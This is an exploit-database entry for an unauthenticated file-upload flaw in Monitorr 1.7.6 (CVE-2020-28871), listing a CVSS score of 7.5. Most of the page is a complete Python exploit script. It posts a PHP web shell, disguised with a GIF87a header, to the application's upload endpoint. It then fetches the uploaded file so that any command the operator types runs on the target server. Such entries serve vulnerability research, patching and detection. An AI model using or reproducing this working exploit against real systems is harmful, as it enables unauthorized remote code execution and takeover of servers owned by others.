Monitorr 1.7.6 Shell Upload

2023.02.10
Credit: Achuth V P
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution # Exploit Author: Achuth V P (retrymp3) # Date: February 09, 2023 # Vendor Homepage: https://github.com/Monitorr/ # Software Link: https://github.com/Monitorr/Monitorr # Tested on: Ubuntu # Version: v1.7.6 # Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability # CVE: CVE-2020-28871 import requests import random import string #from requests.auth import HTTPBasicAuth from colorama import (Fore as F, Back as B, Style as S) BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def payL(): fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php' tf1=requests.post(url+'/assets/php/upload.php', files=( ('fileToUpload', (fileName, 'GIF87a\n<?php\n$var=shell_exec('+'"'+cmd+'"'+');\necho "$var"\n?>')),)) tf2=requests.get(url+'/assets/data/usrimg/'+fileName) print(tf2.text) def sig(): SIG = SB+FY+" "+FR+".-----..___.._____. "+FY+"\n" SIG += FY+" | .. >||__-__-_| \n" SIG += FY+" "+FR+"| |.' ,||_______ "+FY+"\n" SIG += FY+" | _ < ||__-__-_|"+FR+"* * *"+FY+" \n" SIG += FY+" | |\ \ ||__-__-_\n" SIG += FY+" "+FR+"|___ \_ \||_______| "+FY+"\n" SIG += FY+"\n"+" _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST return SIG def argsetup(): about = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution\n'+ST return about if __name__ == "__main__": header = SB+FT+"\n"+' '+FR+'retrymp3\n'+ST print(header) print(sig()) print(argsetup()) #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} url=input("Enter the base url: ") cmd=input("Command: ") payL()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top